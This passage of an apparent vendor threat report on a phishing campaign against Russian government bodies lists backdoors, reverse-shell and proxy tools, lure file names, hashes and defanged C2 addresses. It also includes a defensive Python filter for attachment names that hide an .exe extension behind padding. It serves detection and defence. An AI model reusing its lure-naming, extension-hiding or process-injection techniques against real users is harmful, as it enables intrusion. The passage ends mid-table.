    &lt;li&gt;scripts (&lt;a href="https://vms.drweb.com/search/?q=BAT.DownLoader.1138&amp;lng=en"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
    &lt;li&gt;executable files (&lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49708&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen31.54011&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Siggen2.5463&amp;lng=en"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=BackDoor.RShell.169&amp;lng=en"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseShell.10&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This is a batch file that downloads the PowerShell backdoor &lt;b&gt;PowerShell.BackDoor.109&lt;/b&gt; onto the target system. Through it, the threat actors download and run other malware on the computer.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BAT.DownLoader.1138&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;scan26_08_2025.bat&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;d2106c8dfd0c681c27483a21cc72d746b2e5c18c&lt;/td&gt;
            &lt;td&gt;168[.]100.10[.]73&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This trojan installs &lt;b&gt;BackDoor.Spy.4033&lt;/b&gt;, a backdoor stored in encrypted form in its body. The backdoor allows the attackers to execute commands on the infected system via a reverse shell.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for Trojan.Packed2.49708&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;О проведении личного приема граждан список участников план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\2o1nzu.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;5684972ded765b0b08b290c85c8fac8ed3fea273&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;29ee3910d05e248cfb3ff62bd2e85e9c76db44a5&lt;/td&gt;
            &lt;td&gt;185[.]231.155[.]111&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;План-протокол встречи о сотрудничестве представителей должн.лиц.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;ce4912e5cd46fae58916c9ed49459c9232955302&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\746wljxfs.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;653ffc8c3ec85c6210a416b92d828a28b2353c17&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b52e1c9484ab694720dc62d501deca2aa922a078&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This trojan installs &lt;b&gt;BackDoor.Spy.4038&lt;/b&gt;, a backdoor stored in encrypted form in its body. The backdoor allows the attackers to execute commands on the infected system via a reverse shell.&lt;/p&gt;
&lt;p&gt;Functionality-wise, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen31.54011&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt; is similar to the &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49708&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt; malware, but it has a slightly different payload-extraction algorithm.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;baab225a50502a156222fcc234a87c09bc2b1647&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;93000d43d5c54b07b52efbdad3012e232bdb49cc&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This backdoor executes tasks received from the attackers and is controlled via a Telegram bot. Its main functionality resides in PowerShell code hidden in its body.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.Siggen2.5463&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;The payload&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c96beb026dc871256e86eca01e1f5ba2247a0df6&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;PowerShell.BackDoor.108&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This backdoor allows malicious actors to remotely connect to infected computers via a reverse shell to execute various commands.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.RShell.169&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;633885f16ef1e848a2e057169ab45d363f3f8c57&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This backdoor enables a reverse shell and gives threat actors remote access to the system.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.ReverseShell.10&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;к проектам.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;dd98dcf6807a7281e102307d61c71b7954b93032&lt;/td&gt;
            &lt;td&gt;195[.]2.78[.]133&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td style="text-align:start;"&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 20.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 12.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
            &lt;/td&gt;
            &lt;td&gt;f546861adc7c8ca88e3b302d274e6fffb63de9b0&lt;/td&gt;
            &lt;td&gt;62[.]113.114[.]209&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
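&lt;p&gt;Two tricks recur in the lure file names above, from the BackDoor.ShellNET.1 name table onwards: a program named like an office memo or meeting agenda, and a long run of underscores or en spaces (the ensp entities in the BackDoor.ReverseShell.10 table) that pushes the .exe extension out of the part of the name a mail client displays. The Python below is an added example written for this edit, not code from Doctor Web or from the report; it shows how a mail gateway or EDR could screen attachment names for both tricks. The function names, the padding threshold of eight characters and the executable-extension list are assumptions; the sample names come from the tables above, with the en-space one reconstructed and one benign name constructed for contrast.&lt;/p&gt;

```python
import re

# Extensions that Windows runs as code on double-click (assumption: a typical
# gateway blocklist; extend it for your environment).
EXEC_EXT = {"exe", "scr", "bat", "cmd", "com", "pif", "vbs", "js", "ps1", "msi"}

# Characters used to push the real extension out of the visible part of a name:
# ordinary spaces and underscores, no-break space (U+00A0), en space (U+2002, the
# ensp entity in the tables above) and the other Unicode space separators.
PAD_CHARS = r"[\s_\u00a0\u2000-\u200a\u202f\u3000]"
PAD_RUN = re.compile(PAD_CHARS + r"{8,}(?=\.[^.]+$)")   # eight or more, right before the extension
CYRILLIC = re.compile(r"[\u0400-\u04ff]")


def split_ext(filename):
    """Return (stem, lower-cased extension without the dot); extension is '' if absent."""
    if "." not in filename:
        return filename, ""
    stem, ext = filename.rsplit(".", 1)
    return stem, ext.lower()


def assess_attachment(filename):
    """Return (verdict, reasons, extension) for one attachment name.
    verdict is 'block' for anything executable, 'suspicious' for a padded
    non-executable name, and 'ok' otherwise."""
    stem, ext = split_ext(filename)
    reasons = []
    if ext in EXEC_EXT:
        reasons.append("executable extension ." + ext)
    if PAD_RUN.search(filename):
        reasons.append("extension hidden behind a run of padding characters")
    # The lure names in the report are memo and meeting titles: Cyrillic words
    # separated by spaces, ending in .exe. Flag a program whose stem looks like that.
    if ext in EXEC_EXT and CYRILLIC.search(stem) and " " in stem.strip():
        reasons.append("program named like an office document")
    if ext in EXEC_EXT:
        verdict = "block"
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "ok"
    return verdict, reasons, ext


def reveal(filename):
    """Collapse a padding run into a visible marker so logs and analysts see the
    true extension, e.g. 'Служебная записка ...[40 padding chars].exe'."""
    return PAD_RUN.sub(lambda m: "[" + str(len(m.group(0))) + " padding chars]", filename)


# Sample names: four copied from the tables in this report (the en-space one is
# reconstructed, since the table shows the spaces as HTML entities) and one benign.
SAMPLES = [
    "Службеная записка от 16.06.2025___________________________.exe",
    "О проведении личного приема граждан список участников.exe",
    "Служебная записка от 20.08.2025" + "\u2002" * 40 + ".exe",
    "Протокол совещания.docx",   # constructed benign name
    "scan26_08_2025.bat",
]

if __name__ == "__main__":
    for name in SAMPLES:
        verdict, reasons, _ = assess_attachment(name)
        print(verdict, reveal(name), reasons)
```

&lt;p&gt;The name passed to &lt;span class="string"&gt;assess_attachment&lt;/span&gt; should be the one extracted from the archive after the password quoted in the email body has been applied: in this campaign the executable was shipped inside a password-protected archive, and the archive name itself is rarely incriminating.&lt;/p&gt;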
&lt;h3&gt;The next infection stages&lt;/h3&gt;
&lt;p&gt;We have uncovered the following malicious programs that can be installed on infected devices after they have been compromised:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Inject5.57968&amp;lng=en"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.2&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseProxy.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49862&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;A trojan that carries an encrypted backdoor in its body. The backdoor lets the attackers download further malicious programs onto the infected computer. The payload is decrypted in several stages; in one of them, a block of malicious data is injected into a process of &lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt;, a legitimate component of the Microsoft .NET Framework. The fully decrypted backdoor ultimately runs in the context of that legitimate process, so any command-and-control traffic it generates appears to originate from aspnet_compiler.exe.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Studying &lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;’s activity, using the “sandbox” of the Dr.Web vxCube interactive threat analyzer&lt;/em&gt;&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for Trojan.Inject5.57968&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;The payload&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;pickmum1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e840c521ec436915da71eb9b0cfd56990f4e53e5&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;mummyfile1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;22641dea0dbe58e71f93615c208610f79d661228&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;A backdoor that is controlled via a Telegram bot and executes the attackers’ commands.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.ShellNET.2&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;win.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;1957fb36537df5d1a29fb7383bc7cde00cd88c77&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;A backdoor based on the open-source ReverseSocks5 tool. It starts a SOCKS5 proxy on the infected system to give the attackers remote access to the computer. &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt; is launched via the command interpreter cmd.exe with the parameter &lt;span class="string"&gt;-connect IP&lt;/span&gt;, which specifies the server to connect back to. Some modifications of this backdoor have the address hardcoded instead.&lt;/p&gt;
&lt;p&gt;The following IPs have been detected:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;78[.]128.112[.]209&lt;/span&gt; (specified in the launching command)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;96[.]9.125[.]168&lt;/span&gt; (specified in the launching command)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;188[.]127.231[.]136&lt;/span&gt; (hardcoded in the code)&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;revv2.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;6ec8a10a71518563e012f4d24499b12586128c55&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt; is the detection name for trojanized versions of legitimate programs into which the attackers have implanted malicious code. Doctor Web’s malware analysts encountered malicious modifications of the WinRAR and 7-Zip archivers, the Visual Studio Code editor, the AkelPad text editor and several other applications, among them a Sumatra PDF Reader build that the cybercriminals passed off as the MAX messenger. These modifications no longer perform their original function: when launched, they do nothing but initialize the implanted trojan component.&lt;/p&gt;
&lt;p&gt;Depending on the cybercriminals’ goals, these modifications can carry a variety of payloads, including:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseProxy.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; (&lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt; (&lt;a href="https://github.com/HavocFramework/Havoc" target="_blank"&gt;Havoc&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt; (CobaltStrike)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt; (AsyncRAT)&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Clipper.808&amp;lng=en"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for Trojan.Packed2.49862&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;The payload&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;rev2.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;8279ad4a8ad20bf7bbca0fc54428d6cdc136b776&lt;/td&gt;
            &lt;td&gt;188[.]127.231[.]136&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;revv.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a2326011368d994e99509388cb3dc132d7c2053f&lt;/td&gt;
            &lt;td&gt;192[.]168.11[.]10&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7zr.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winload.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;451cfa10538bc572d9fd3d09758eb945ac1b9437&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Command line RAR&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winlock.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;winsrv.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;firefox.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;bbe3a5ef79e996d9411c8320b879c5e31369921e&lt;/td&gt;
            &lt;td&gt;94[.]198.52[.]210&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;AkelPad.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e8ab26b3141fbb410522b2cbabdc7e00a9a55251&lt;/td&gt;
            &lt;td&gt;78[.]128.112[.]209&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;dcd374105a5542ef5100f6034c805878153b1205&lt;/td&gt;
            &lt;td&gt;192[.]168.88[.]104&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e51a65f50b8bb3abf1b7f2f9217a24acfb3de618&lt;/td&gt;
            &lt;td&gt;192[.]168.1[.]157&lt;/td&gt;
